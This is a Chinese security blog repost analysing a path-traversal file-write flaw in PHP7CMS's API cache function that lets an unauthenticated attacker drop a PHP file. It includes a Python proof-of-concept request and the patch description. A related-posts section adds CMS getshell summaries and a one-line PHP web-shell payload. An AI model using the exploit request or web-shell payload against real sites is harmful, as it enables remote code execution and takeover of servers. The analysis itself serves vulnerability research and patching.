PHP7CMS 无条件前台GETSHELL

最新推荐文章于 2024-10-31 13:19:53 发布
转载 最新推荐文章于 2024-10-31 13:19:53 发布 · 587 阅读 · 0

本文详细解析了PHP7CMS中的GETSHELL漏洞,该漏洞允许攻击者通过构造特定请求,利用缓存类的无条件写入功能,实现远程代码执行。漏洞存在于API控制器的save_form_data方法中,由于对输入参数缺乏有效过滤,导致攻击者能够跨目录写入恶意代码。最新版已修复此漏洞,加强了输入验证。

PHP7CMS 无条件前台GETSHELL

Version:2018-10-09

//最新版中以修复此漏洞

这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的。

01

02

03

04

05

06

07

08

09

10

11

12

// php7cms/Core/Controllers/Api/Api.php

// 52~61 line

public function save_form_data() {

 

    $rt = \Phpcmf\Service::L('cache')->init('file')->save(

        \Phpcmf\Service::L('Input')->get('name'),

        \Phpcmf\Service::L('Input')->post('data'),

        7200

    );

    var_dump($rt);

    exit;

}

调用了Cache类中 init 函数,参数分别为get(‘name’)和post(‘data’)。

01

02

03

04

05

06

07

08

09

10

11

12

// php7cms/Fcms/Library/Cache.php

 // 112~121 line

 public function init($handler = '', $prefix = 'site-'.SITE_ID.'-') {

       $config = new \Config\Cache();

       $config->handler = 'file';

       $config->prefix = $prefix;

       !$config->prefix && $config->prefix = 'site-'.SITE_ID.'-';

       $config->path = WRITEPATH.'caching/';

       $cache = \Config\Services::cache($config, 0);

 

       return $cache;

   }

初始化缓存类,为prefix参数拼接字符串后直接无任何过滤直接传入CI框架的缓存类中,中间框架的执行流程就不在文章里写了。

直接看最后一步

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

// php7cms/System/Cache/Handlers

// 107~125 line

public function save(string $key, $value, int $ttl = 60)

{

  $key = $this->prefix . $key;

 

  $contents = [

    'time'         => time(),

    'ttl'         => $ttl,

    'data'         => $value,

  ];

 

  if ($this->writeFile($this->path . $key, serialize($contents)))

  {

    chmod($this->path . $key, 0640);

 

    return true;

  }

 

  return false;

}

 

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

//324~345 line       

protected function writeFile($path, $data, $mode = 'wb')

  {

    if (($fp = @fopen($path, $mode)) === false)

    {

      return false;

    }

 

    flock($fp, LOCK_EX);

 

    for ($result = $written = 0, $length = strlen($data); $written < $length; $written += $result)

    {

      if (($result = fwrite($fp, substr($data, $written))) === false)

      {

        break;

      }

    }

 

    flock($fp, LOCK_UN);

    fclose($fp);

 

    return is_int($result);

  }

直接写入到缓存目录中,其中并没有过滤”.”和”/”,可以跨目录写入。所以不需要考虑路由问题。

POC:

1

2

3

4

5

from requests import post

postData = {

  'data':'<?php phpinfo()?>'

}

postTest = post("http://localhost//index.php?s=api&c=api&m=save_form_data&name=/../../../adminss.php",data=postData)

新版修复:

 

首先给dr_safe_replace 参数增加了两个新的过滤条件 ” . “和 ” ‘ “,在原本漏洞出发点接收get值的时候用这个函数过滤。

【西湖论剑】phpok6.0前台反序列化getshell
weixin_45751765的博客
03-21 6182
1NDEX0x00 前言0x01 brain.md捋一下框架poc浅析动调一下poc(小bug 0x00 前言 西湖线下的phpok6.0 后面才知道是个0day 已知poc形式 admin.php 控制器为login 方法为update 其余参数: fid=…/index fcode=shell quickcode=……… 看页面回显似反序列化漏洞,可写入webshell 参考suanve师傅的文章做个复现 phpok6.0前台反序列化getshell 师傅的这篇和主办方的利用点有点小区别 一个是利用 $
实战 | 登录处前台绕过getshell
2301_80115097的博客
03-15 994
即可,这个语句正常执行,说明存在任意文件上传漏洞。csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。A0,导出文件,打开,成功执行命令。5.测试了一圈发现导出功能,导出来看来一下,发现是”定制管理”中的内容,这不就是刚刚在ctf中刷过的题吗,csv注入。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
W78CMSasp企业网站管理系统简体中文版v2.9.3GBK
08-05
基本设置:后台可上传LOGO,修改尺寸,修改联系方式,是否开放、关闭注册。会员注册是否审核、留言是否审核等。 管 理 员:可新增超级管理员或普通管理员,不同级别管理员登陆后台将有不同的权限。 显示设置:后台可设置各栏目显示条数、分页记录数等。 自定义导航:新增修改导航菜单、菜单排序等。 SQL注入:后台可设置SQL防注入参数等,SQL注入记录,可封锁攻击者IP等。 SMTP邮件配置:新增邮件配置,
CMS getshell
A19911511842的博客
10-31 477
实际上源码内黑名单中,只过滤了大小写,php、jsp、asp、aspx等常见后缀,容易被绕过。所有我在原基础上加了所有可以被解析的后缀名,如php2,php3,php4 ,php5,phtml,pht等。所以继续添加PHP后缀,发现被过滤,结合以上说明,在后面添加后缀的过滤检测是黑名单,可以绕过。漏洞为前台任意用户密码修改和前台用户文件上传然后getshell。1. 弱口令进入前台用户admin123/admin123。但是在原文件的基础上继续添加随意后缀,发现成功上传了。
cms前台getshell分析
IT-Andy
12-18 1549
前言 毫无套路的在cnvd上看见了一个漏洞,毫无套路的想着分析一下 一脸懵逼的Getshell 官网地址:http://www.earcms.net/ 先到官网把源码下载下来搭建一下,结果发现源码是混淆过的 这种混淆方式很常见,解密也不难,因为已经知道是前台文件上传导致的getshell,所以暂时不需要全部解密出来一点点分析,暂时只关注他的上传点。 毫无套路的搭建完成后我们看到...
php7 cms,PHP7CMS 无条件前台GETSHELL
weixin_36308872的博客
03-09 213
Version:2018-10-09//最新版中以修复此漏洞这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的。[PHP] 纯文本查看 复制代码// php7cms/Core/Controllers/Api/Api.php// 52~61 linepublic function save_form_data() {$rt = \Phpcmf\Service::L('cac...
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 7460
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
2401_84263282的博客
05-05 1384
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1612
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞。
php面试题汇总(必会)
pz_winner的博客
11-08 3791
1、酒店预订怎么实现?怎么设计表   你好,我大概的说下我们的业务流程,我们的业务流程是:用户在网站浏览酒店信息,可以根据地区检索出该地区的酒店信息。列表展示酒店的信息由:酒店的名称,酒店图片,酒店位置,评论人数,评论分数以及最低入住价格。用户选中要入住的酒店进入酒店详情页面,查看酒店的介绍以及酒店的房型列表,用户根据他要入住的时间和离店的时间,检索出这个时间段内的所有可选房型(房间数量-当天
PHP 最新精品面试题
weixin_43681591的博客
01-13 3274
1、酒店预订怎么实现?怎么设计表   你好,我大概的说下我们的业务流程,我们的业务流程是:用户在网站浏览酒店信息,可以根据地区检索出该地区的酒店信息。列表展示酒店的信息由:酒店的名称,酒店图片,酒店位置,评论人数,评论分数以及最低入住价格。用户选中要入住的酒店进入酒店详情页面,查看酒店的介绍以及酒店的房型列表,用户根据他要入住的时间和离店的时间,检索出这个时间段内的所有可选房型(房间数量-当天的订...
phpcms v9前台getshell
weixin_34235457的博客
04-12 1422
PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件。看到到处都是这个漏洞的利用.加班完这个点看看触发点.主要的问题...
wei php getshell,海洋cms最新版前台getshell(附靶机)
weixin_30587041的博客
04-06 618
cms版本:6.45官网好像是6.48版本了直接上代码[mw_shl_code=applescript,true]function parseIf($content){if (strpos($content,'{if:')=== false){return $content;}else{$labelRule = buildregx("{if.*?)}(.*?){end if}","is");$la...
[代码审计]某开源商城前台getshell
weixin_30826095的博客
02-05 328
0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来。 下面就分享一下自己审这套系统的整个过程。 0x01 系统简介 略 0x02 审计入口 看到inc\function\global.php 文件 这套系统用了360的防护代码 对get,post,cookie都进行了过滤,但有一点挺有趣的。 在p=ad...
php strlen漏洞,CmsEasy前台无限制GetShell
weixin_42196750的博客
03-27 3034
来源:阿里先知(安全情报)简要描述CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话前台getshell漏洞修正;命令执行漏洞修正;我们就根据补丁来分析一下这个前台Getshell漏洞。漏洞详情修改的文件不多,通过diff发现补丁中lib/default/tool_act.php 392行的cut_image_action()函数被注释了。来看看这个函数/*function c...
php getshell,CLTPHP_v5.5.3 前台Getshelll漏洞
weixin_36277530的博客
03-10 2496
默认后台地址: http://127.0.0.1/admin/login/index.html默认账号密码: 后台登录名:admin 密码:admin123代码分析1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行:在这段函数中,未经用户权限验证,获取表单内容,存在越权绕过上传的情况。我们继续跟进move函数:2、文件位置:/think/library...
OurPHP20180718前台getshell分析
KEY0NE的个人博客
04-30 333
影响范围:v1.7.5-v1.8.3先抛出payload,再进行代码分析前台getshell首先,访问http://127.0.0.1/ourphp20180718/function/editor/php/upload_json.php?upload_file=1获取到:<!--12345||7Hv9WqglWlPJZPgrFVUvpFnP4DmuTCn1-...
shopex前台普通用户getshell最新漏洞
收集盒 Book box
11-08 1076
第一个:想办法找到目标网站的绝对路径 http://www.baidu.com/install/svinfo.php?phpinfo=true http://www.baidu.com/core/api/shop_api.php http://www.baidu.com/core/api/site/2.0/api_b2b_2_0_cat.php http://www.bai
ThinkSNS2.5前台getshell+后台任意文件删除
weixin_30629977的博客
08-07 246
12年爆出的一个洞 前几天比赛的一个cms 于是跟出题人表哥要过来审计了看看 漏洞文件再根目录thumb.php中 1 <?php 2 /* 3 * 自动缩略图 参数 url|w|h|type="cut/full"|mark="text/image|r" 4 * thumb.php?url=/thinksns/data/userface/000/00/00/...
pbootcms前台getshell
最新发布
06-20
### PbootCMS前台Getshell漏洞利用与防御 PbootCMS是一款基于PHP开发的内容管理系统(CMS),因其功能强大且易于使用而受到广泛欢迎。然而,由于其代码实现可能存在安全漏洞,攻击者可能通过特定的手段在前台实现Getshell攻击。以下将详细介绍该漏洞的利用方式及防御措施。 #### 漏洞利用方式 PbootCMS前台Getshell漏洞通常涉及文件上传或动态模板解析中的安全问题。例如,如果系统未对用户上传的文件进行严格校验,攻击者可能上传包含恶意PHP代码的文件,并通过访问该文件实现命令执行。此外,若模板引擎未正确过滤用户输入,可能导致远程代码执行(RCE)[^1]。 一种常见的利用方法是通过伪造请求,将恶意代码注入到系统的动态解析文件中。例如,攻击者可以构造如下payload: ```php <?php system($_GET['cmd']); ?> ``` 此代码允许攻击者通过`cmd`参数执行任意系统命令。如果PbootCMS未对模板内容进行严格的转义处理,上述payload可能被成功注入并执行。 #### 防御措施 针对PbootCMS前台Getshell漏洞,可以从以下几个方面加强防御: 1. **文件上传校验** 系统应严格限制上传文件的类型和大小,禁止上传可执行脚本文件(如`.php`、`.php3`等)。可以通过白名单机制仅允许特定类型的文件上传,例如图片格式(`.jpg`、`.png`)[^1]。 2. **输入验证与过滤** 对所有用户输入进行严格的验证和过滤,防止恶意代码注入。特别是对于动态模板解析场景,应对模板内容进行HTML实体化处理,避免执行非法代码。 3. **权限管理** 限制文件操作的权限,确保上传目录不可直接访问。例如,可以通过配置Web服务器(如Nginx或Apache)禁用上传目录的PHP解析功能。示例如下: ```nginx location ~* /uploads/ { types { image/jpeg jpg; image/png png; } default_type none; return 403; } ``` 4. **定期更新与补丁** 及时关注PbootCMS官方发布的安全公告,安装最新版本以修复已知漏洞。同时,定期进行代码审计,发现潜在的安全隐患并及时修补。 5. **日志监控与告警** 启用详细的日志记录功能,监控可疑行为(如频繁的POST请求或异常文件上传)。结合入侵检测系统(IDS)或Web应用防火墙(WAF),进一步提升系统的安全性。 #### 示例代码:增强文件上传安全性 以下是一个改进后的文件上传校验示例: ```php function secure_upload($file) { $allowed_types = ['image/jpeg', 'image/png']; // 允许的MIME类型 if (!in_array($file['type'], $allowed_types)) { return false; // 拒绝非白名单类型 } $extension = pathinfo($file['name'], PATHINFO_EXTENSION); if (!in_array($extension, ['jpg', 'png'])) { return false; // 拒绝非白名单扩展名 } // 检查文件是否为合法图片 if (!getimagesize($file['tmp_name'])) { return false; // 拒绝非图片文件 } return move_uploaded_file($file['tmp_name'], "uploads/" . uniqid() . '.' . $extension); } ``` 上述代码通过多重校验确保上传文件的安全性,有效防止恶意文件的注入。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值